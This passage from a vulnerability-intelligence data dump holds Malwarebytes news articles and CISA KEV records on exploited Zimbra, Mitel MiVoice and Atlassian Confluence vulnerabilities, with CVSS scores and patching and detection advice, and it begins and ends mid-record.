[Synacor](<https://synacor.com/about-us>). 
Zimbra Collaboration, formerly known as the Zimbra Collaboration Suite (ZCS), is a collaborative software suite that includes an email server and a web client. It is widely used across different industries and government organizations. We reported about a cross-site scripting (XSS) [zero-day vulnerability in the Zimbra email platform](<https://www.malwarebytes.com/blog/news/2022/02/threat-actor-steals-email-with-zimbra-zero-day>) back in February 2022. At the time, Zimbra claimed there were 200,000 businesses, and over a thousand government and financial institutions, using its software.\n\nThe initial investigations showed evidence indicating the likely cause of these breaches was exploitation of [CVE-2022-27925](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27925>), a remote-code-execution (RCE) vulnerability in ZCS. This vulnerability was patched by Zimbra in March 2022.\n\nThe description of the CVE informs us that Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has _mboximport_ functionality that receives a ZIP archive and extracts files from it. An authenticated user with administrator rights has the ability to upload arbitrary files to the system, leading to directory traversal.\n\nZimbra patched the vulnerability, but, in the company's own words, it would turn out to be an \"incomplete fix for CVE-2022-27925\".\n\n## Mass exploitation\n\nIt is uncommon for a vulnerability that requires administrator rights to be used in a large-scale attack. Firstly, because it is usually a lot of work for a cybercriminal to obtain valid administrator credentials. But also because once they have administrator credentials there are a lot more options open to them. Although in this case, uploading zip files that will be auto-magically extracted sounds like a good way to establish a foothold.\n\nSo how did it come about that a serious yet hard-to-exploit vulnerability got involved in a larger attack rather than a targeted one? 
The researchers did a lot of digging and found that the threat actors were chaining the known vulnerability with a zero-day path traversal vulnerability. The authentication bypass vulnerability was assigned [CVE-2022-37042](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37042>) after sharing their findings with Zimbra. A path traversal vulnerability allows an attacker to access files on your web server to which they should not have access.\n\nThe underlying problem was that the authentication check, after sending an error message to the unauthenticated attacker, continued executing the subsequent code. So, even though the attackers received an error message, the web shell was planted on the server anyway. These web shells were malicious scripts used by the attackers with the intent to escalate and maintain persistent access. In other words, a backdoor.\n\nKnowing the paths at which the attacker had installed web shells, and the behavior of ZCS when contacting a URL that did not exist, the researchers performed a scan of ZCS instances in the wild to identify third-party compromises using the same web shell names. This scan yielded over 1,000 infected ZCS instances worldwide. The real number of infected instances is probably a lot higher since the scan only looked for shell paths known to the researchers.\n\n## Mitigation\n\nZimbra has patched the authentication issue in its [9.0.0P26](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P26>) and [8.8.15P33](<https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P33>) releases. If you were late to patch for the RCE vulnerability, you should assume that your server instance has been compromised.\n\nIn order to verify the presence of web shells on a ZCS instance, one technique that can be used is to compare the list of JSP files on a Zimbra instance with those present by default in Zimbra installations. 
Lists of valid JSP files included in Zimbra installations can be found [on GitHub](<https://github.com/volexity/threat-intel/tree/main/2022/2022-08-10%20Mass%20exploitation%20of%20\\(Un\\)authenticated%20Zimbra%20RCE%20CVE-2022-27925>) for the latest version of 8.8.15 and of 9.0.0.\n\n## Update August 17, 2022\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC) have published a joint [Cybersecurity Advisory (CSA)](<https://www.cisa.gov/uscert/sites/default/files/publications/aa22-228a-threat-actors-exploiting-multiple-cves-against-zimbra.pdf>) in response to the active exploitation of the vulnerabilities in the Zimbra Collaboration Suite (ZCS).\n\nStay safe, everyone!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-11T13:00:00", "type": "malwarebytes", "title": "[updated] Thousands of Zimbra mail servers backdoored in large scale attack", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-08-11T13:00:00", "id": "MALWAREBYTES:FD1933FDD45B339A42C8A69C46589A0D", 
"href": "https://www.malwarebytes.com/blog/news/2022/08/thousands-of-zimbra-mail-servers-backdoored-in-large-scale-attack", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-01-16T00:11:16", "description": "Ransomware gangs have shown that they can play a long game, so it shouldn't come as a surprise to learn of one prepared to wait months to make use of a compromised system.\n\nS-RM's Incident Response team [shared details](<https://insights.s-rminform.com/lorenz-cyber-intelligence-briefing-special>) of a campaign attributed to the Lorenz ransomware group that exploited a specific vulnerability to plant a backdoor that wasn't used until months later.\n\n## Lorenz\n\nThe Lorenz ransomware group first appeared on the radar in 2021. They have targeted organizations all over the world and are known to specialize in VoIP vulnerabilities to access their victims' environments. Like many ransomware groups, they steal their victim's data before encrypting it, so they can add the threat of leaked data to the threat of encryption making it irrecoverable.\n\n## Vulnerability\n\nThe researchers found in a specific case that the Lorenz group was able to exploit a vulnerability listed as [CVE-2022-29499](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29499>) a week prior to it being patched. This vulnerability, which has a CVSS score of 9.8 out of 10, exists in the Service Appliance component in Mitel MiVoice Connect through 19.2 SP3 and allows remote code execution because of incorrect data validation. 
Essentially, the vulnerability allowed an unauthenticated remote attacker to send specially crafted requests to inject commands and achieve remote code execution.\n\n## Exploited\n\nAfter a vulnerability has been [discovered](<https://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/>) and [patched](<https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-22-0002>), it is not uncommon for organizations to wait for a convenient moment to apply the patch. But as soon as a patch is made available, threat actors have the opportunity to reverse engineer it, find the vulnerability, create an exploit, and then scan for vulnerable systems. It's exactly this window of opportunity that the Lorenz ransomware group managed to exploit, in order to install a web shell on the vulnerable system. This web shell has a unique name and requires credentials to access the system.\n\nThe shell was placed some five months before the actual ransomware event, and sat dormant throughout that period. Whether the backdoor was created by an [Initial Access Broker (IAB)](<https://www.malwarebytes.com/blog/business/2022/11/initial-access-brokers-iabs-3-ways-they-break-into-corporate-networks-and-how-to-detect-them>) and then sold on to the ransomware group or whether the Lorenz group created it themselves is unknown. But the result is the same.\n\n## Why wait?\n\nThe time between the compromise and the deployment of the ransomware can be explained by several theories.\n\n * The backdoor was planted by an IAB that waited for the right offer to sell off their access to the compromised system.\n * When an easy-to-exploit vulnerability is available, a group will first compromise as many systems as possible and later work their way through the list of victims.\n * With the initial breach the threat actor replaced several key artefacts on the perimeter CentOS system, effectively blocking the creation of any additional logging or audit data. 
After a while old logs will be deleted and no new ones are created, which improves the attacker's chances of going in undetected.\n\n## Patching\n\nBesides showing us how important it is to [patch in a timely fashion](<https://www.malwarebytes.com/business/vulnerability-patch-management>), this vulnerability has shown us that patching alone is not always enough.\n\nVictims were claimed with this vulnerability before a patch was available. The vulnerability was found by investigating a suspected ransomware intrusion attempt, so there was at least one group that was able to use the vulnerability when it was still a [zero-day](<https://www.malwarebytes.com/glossary/zero-day>).\n\nThe exploit details were published in June and the victim patched in July, but was compromised a week prior to patching. So, the backdoor was planted during the time between the patch being released and it actually getting installed, the so-called \"patch gap\".\n\n## Monitoring\n\nSo, what else do we need to do when we patch a vulnerable system? A difficult question with no easy cure-all answer. But there are some pieces of advice we can give:\n\n * Keep the patch gap as small as possible. We know it's not easy, but it helps a lot.\n * Check vulnerable devices before and after patching for indicators of compromise (IOCs). They may not always be available, but when it concerns a vulnerability that's known to have been exploited you may be able to find the IOCs or figure out where to look.\n * Constant monitoring. If you didn't find the backdoor, make sure you have the capabilities to find the tools threat actors use for lateral movement, and block the final payload (ransomware in this case).\n * Look for unauthorized access or atypical behavior originating from the recently patched device/system.\n\n* * *\n\n**We don't just report on threats--we remove them**\n\nCybersecurity risks should never spread beyond a headline. 
Keep threats off your devices by [downloading Malwarebytes today](<https://www.malwarebytes.com/for-home>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-15T18:45:00", "type": "malwarebytes", "title": "Timely patching is good, but sometimes it's not enough", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2023-01-15T18:45:00", "id": "MALWAREBYTES:58E222D9BD3FC1273D169FE26CA6D804", "href": "https://www.malwarebytes.com/blog/news/2023/01/timely-patching-is-good-but-does-not-provide-full-ransomware-protection", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-03T21:56:15", "description": "[Researchers](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>) found a vulnerability in Atlassian Confluence by conducting an incident response investigation. 
Atlassian rates the severity level of this vulnerability as critical.\n\nAtlassian has issued a [security advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) and is working on a fix for the affected products. This qualifies the vulnerability as a zero-day vulnerability that is being actively exploited in the wild.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This vulnerability is listed as [CVE-2022-26134](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134>).\n\n## Confluence\n\nAtlassian Confluence is a collaboration tool in wiki style. Confluence is a team collaboration platform that connects teams with the content, knowledge, and their co-workers, which helps them find all the relevant information in one place. Teams use it to work together on projects and share knowledge.\n\nConfluence Server is the on-premises version, which is being phased out. Confluence Data Center is the self-managed enterprise edition of Confluence.\n\n## The vulnerability\n\nThe description of CVE-2022-26134 says it is a critical unauthenticated remote code execution vulnerability in Confluence Server and Confluence Data Center.\n\nDuring the investigation, the researchers found JSP web shells written to disk. JSP (Jakarta Server Pages or Java Server Pages) is a server-side programming technology that helps software developers create dynamically generated web pages based on HTML, XML, SOAP, or other document types. JSP is similar to PHP and ASP, but uses the Java programming language.\n\nIt became clear that the server compromise stemmed from an attacker launching an exploit to achieve remote code execution. 
The researchers were able to recreate that exploit and identify a zero-day vulnerability impacting fully up-to-date versions of Confluence Server.\n\nAfter the researchers contacted Atlassian, Atlassian confirmed the vulnerability and subsequently assigned the issue CVE-2022-26134. It confirmed the vulnerability works on current versions of Confluence Server and Data Center.\n\n## The attack\n\nThe researchers at Volexity were unwilling to provide any details about the attack method since there is no patch available for this vulnerability. However, they were able to provide some details about the shells that were dropped by exploiting the vulnerability.\n\nA web shell is a malicious script used by an attacker that allows them to escalate and maintain persistent access on an already compromised web application. (Not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)\n\nThis web shell was identified as the China Chopper web shell. The China Chopper web shell is commonly used by malicious Chinese actors, including advanced persistent threat (APT) groups, to remotely control web servers. The web shell has two parts, the client interface and the small (4 kilobytes in size) receiver host file on the compromised web server. But access logs seemed to indicate that the China Chopper web shell only served as a means of secondary access.\n\nOn further investigation, they found bash shells being launched by the Confluence web application process. This stood out because it had spawned a bash process, which spawned a Python process that in turn spawned a bash shell. Bash is the default shell for many Linux distros and is short for the GNU Bourne-Again Shell.\n\nResearch showed that the web server process as well as the child processes created by the exploit were all running as the root user and group (with full privileges). 
These types of vulnerabilities are dangerous, as they allow attackers to execute commands and gain full control of a vulnerable system. They can even do this without valid credentials as long as it is possible to make web requests to the Confluence system.\n\nAfter successfully exploiting the Confluence Server systems, the attacker immediately deployed an in-memory copy of the BEHINDER implant. BEHINDER provides very powerful capabilities to attackers, including memory-only web shells and built-in support for interaction with [Meterpreter](<https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/>) and [Cobalt Strike](<https://blog.malwarebytes.com/glossary/cobalt-strike/>).\n\n## Mitigation\n\nThere are currently no fixed versions of Confluence Server and Data Center available. In the interim, users should work with their security team to consider the best course of action. Options to consider include:\n\n * Restricting access to Confluence Server and Data Center instances from the internet.\n * Disabling Confluence Server and Data Center instances.\n * If you are unable to take the above actions, implementing a WAF (Web Application Firewall) rule which blocks URLs containing **${** may reduce your risk.\n\n_Note: **${** is the first part of a parameter substitution in a shell script_\n\n## Affected versions\n\nAll supported versions of Confluence Server and Data Center are affected. According to Atlassian, it\u2019s likely that **all** versions of Confluence Server and Data Center are affected, but they are still investigating and have yet to confirm the earliest affected version.\n\nOne important exception: if you access your Confluence site via an atlassian.net domain. 
This means it is hosted by Atlassian and is not vulnerable.\n\nWe will keep you posted about the developments, so stay tuned.\n\n## Update June 3, 2022\n\nAtlassian has released versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 which contain a fix for this issue.\n\n**What You Need to Do**\n\nAtlassian recommends that you upgrade to the latest Long Term Support release. For a full description of the latest version, see the [Confluence Server and Data Center Release Notes](<https://confluence.atlassian.com/doc/confluence-release-notes-327.html>). You can download the latest version from the [download centre](<https://www.atlassian.com/software/confluence/download-archives>).\n\nThe post [[updated]Unpatched Atlassian Confluence vulnerability is actively exploited](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2022-06-03T14:41:58", "type": "malwarebytes", "title": "[updated]Unpatched Atlassian Confluence vulnerability is actively exploited", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-03T14:41:58", "id": "MALWAREBYTES:CA300551E02DA3FFA4255FBA0359A555", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-14T17:04:04", "description": "Microsoft has warned that "multiple adversaries and nation-state actors" are making use of the recent Atlassian Confluence RCE vulnerability. A fix is now available for [CVE-2022-26134](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134>). It is essential users of Confluence address the patching issue immediately. 
\n\n## Confluence vulnerability: Background\n\nAt the start of June, researchers [discovered a vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited/>) in Atlassian Confluence via an incident response investigation. Confluence, a Wiki-style collaboration tool, experienced a \"critical unauthenticated remote code execution vulnerability\". It affected Confluence Server and Confluence Data Center.\n\nThe attack discovered during the investigation revealed web shells deployed on the server. These web shells allow for persistent access on compromised web applications. The web server process and its child processes ran as root with full privileges. This is very bad news, and allowed for execution of commands even without valid credentials.\n\nWorse, the web shell found is one commonly used by various Advanced Persistent Threat (APT) groups. This almost certainly isn't the kind of thing admins discovering an attack want to hear mid-investigation.\n\nUnfortunately, mitigation advice was somewhat limited. It ranged from restricting access to simply turning off Confluence Server and Data Center instances. On June 3, Atlassian [released](<https://confluence.atlassian.com/doc/confluence-release-notes-327.html>) versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 which contained a fix for this vulnerability.\n\n## The current situation\n\nHere are the latest observations from Microsoft:\n\n> Multiple adversaries and nation-state actors, including DEV-0401 and DEV-0234, are taking advantage of the Atlassian Confluence RCE vulnerability CVE-2022-26134. 
We urge customers to upgrade to the latest version or apply recommended mitigations: <https://t.co/C3CykQgrOJ>\n> \n> -- Microsoft Security Intelligence (@MsftSecIntel) [June 11, 2022](<https://twitter.com/MsftSecIntel/status/1535417776290111489?ref_src=twsrc%5Etfw>)\n\nMicrosoft continues:\n\n> _In many cases impacted devices have been observed with multiple disparate instances of malicious activity, including extensive device and domain discovery, and the deployment of payloads like Cobalt Strike, web shells, botnets like Mirai and Kinsing, coin miners, and ransomware._\n\n## A mixed bag of attacks\n\nIndustrious malware authors really have been having a grand time of things with this vulnerability. As noted by Microsoft, several varied approaches to compromise and exploitation are being used. [AvosLocker Ransomware](<https://www.bleepingcomputer.com/news/security/confluence-servers-hacked-to-deploy-avoslocker-cerber2021-ransomware/>) and [Linux botnets](<https://www.bleepingcomputer.com/news/security/linux-botnets-now-exploit-critical-atlassian-confluence-bug/>) are getting in on the action. Cryptomining [jumping on the bandwagon](<https://www.bleepingcomputer.com/news/security/hackers-exploit-recently-patched-confluence-bug-for-cryptomining/>) is an inevitability across most scams we see, and this is no exception.\n\nMicrosoft also noticed the Confluence vulnerability being exploited to download and deploy Cerber2021 ransomware. The Record [observed](<https://therecord.media/microsoft-ransomware-groups-nation-states-exploiting-atlassian-confluence-vulnerability/>) that Cerber2021 is a "relatively minor player", with both Windows and Linux versions used to lock up machines. Here's an example of the ransomware, via MalwareHunterTeam:\n\n> There is a ransomware currently active that is calling itself Cerber. \nHas Windows & Linux versions. \nLooks started to spread in the first half of November. 
IDR seen both Linux (multiple victims got git files encrypted) & Windows user victims already from different countries. \n \n [pic.twitter.com/saPGsTlDbt](<https://t.co/saPGsTlDbt>)\n> \n> -- MalwareHunterTeam (@malwrhunterteam) [December 4, 2021](<https://twitter.com/malwrhunterteam/status/1467264298237972484?ref_src=twsrc%5Etfw>)\n\nHaving the fixes to address this issue is great, but organisations need to actually make use of them. This is still a serious problem for anyone using unpatched versions of affected Confluence installations.\n\nIf you don't want to run the gauntlet of APT groups, cryptomining chancers, botnets and more, the message is loud and clear: get on over to the [Confluence Download Archives](<https://www.atlassian.com/software/confluence/download-archives>) and patch immediately.\n\nThe post ["Multiple adversaries" exploiting Confluence vulnerability, warns Microsoft](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/multiple-adversaries-exploiting-confluence-vulnerability-warns-microsoft/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-14T12:43:08", "type": "malwarebytes", "title": "\u201cMultiple adversaries\u201d exploiting Confluence vulnerability, warns Microsoft", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 
"integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-14T12:43:08", "id": "MALWAREBYTES:4E1B9086679032E60157678F3E82229D", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/multiple-adversaries-exploiting-confluence-vulnerability-warns-microsoft/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-06-03T15:24:43", "description": "Zimbra Collaboration (ZCS) contains a flaw in the mboximport functionality, allowing an authenticated attacker to upload arbitrary files to perform remote code execution. This vulnerability was chained with CVE-2022-37042, which allows for unauthenticated remote code execution.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-11T00:00:00", "type": "cisa_kev", "title": "Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-08-11T00:00:00", "id": "CISA-KEV-CVE-2022-27925", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:24:43", "description": "Zimbra Collaboration (ZCS) contains an authentication bypass vulnerability in MailboxImportServlet. This vulnerability was chained with CVE-2022-27925 which allows for unauthenticated remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-11T00:00:00", "type": "cisa_kev", "title": "Zimbra Collaboration (ZCS) Authentication Bypass Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-08-11T00:00:00", "id": "CISA-KEV-CVE-2022-37042", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:24:43", "description": "The Service Appliance component in Mitel MiVoice Connect allows remote code execution due to incorrect data validation.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-27T00:00:00", "type": "cisa_kev", "title": "Mitel MiVoice Connect Data Validation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2022-06-27T00:00:00", "id": "CISA-KEV-CVE-2022-29499", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T15:41:25", "description": "Atlassian Questions For Confluence App has hard-coded credentials, exposing the username and password in plaintext. 
A remote unauthenticated attacker can use these credentials to log into Confluence and access all content accessible to users in the confluence-users group.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-29T00:00:00", "type": "cisa_kev", "title": "Atlassian Questions For Confluence App Hard-coded Credentials Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26138"], "modified": "2022-07-29T00:00:00", "id": "CISA-KEV-CVE-2022-26138", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:24:43", "description": "Zimbra Collaboration (ZCS) allows an attacker to inject memcache commands into a targeted instance which causes an overwrite of arbitrary cached entries.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": 
"3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-04T00:00:00", "type": "cisa_kev", "title": "Zimbra Collaboration (ZCS) Command Injection Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924"], "modified": "2022-08-04T00:00:00", "id": "CISA-KEV-CVE-2022-27924", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-03T15:24:43", "description": "RARLAB UnRAR on Linux and UNIX contains a directory traversal vulnerability, allowing an attacker to write to files during an extract (unpack) operation.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-09T00:00:00", "type": "cisa_kev", "title": "RARLAB UnRAR Directory Traversal Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", 
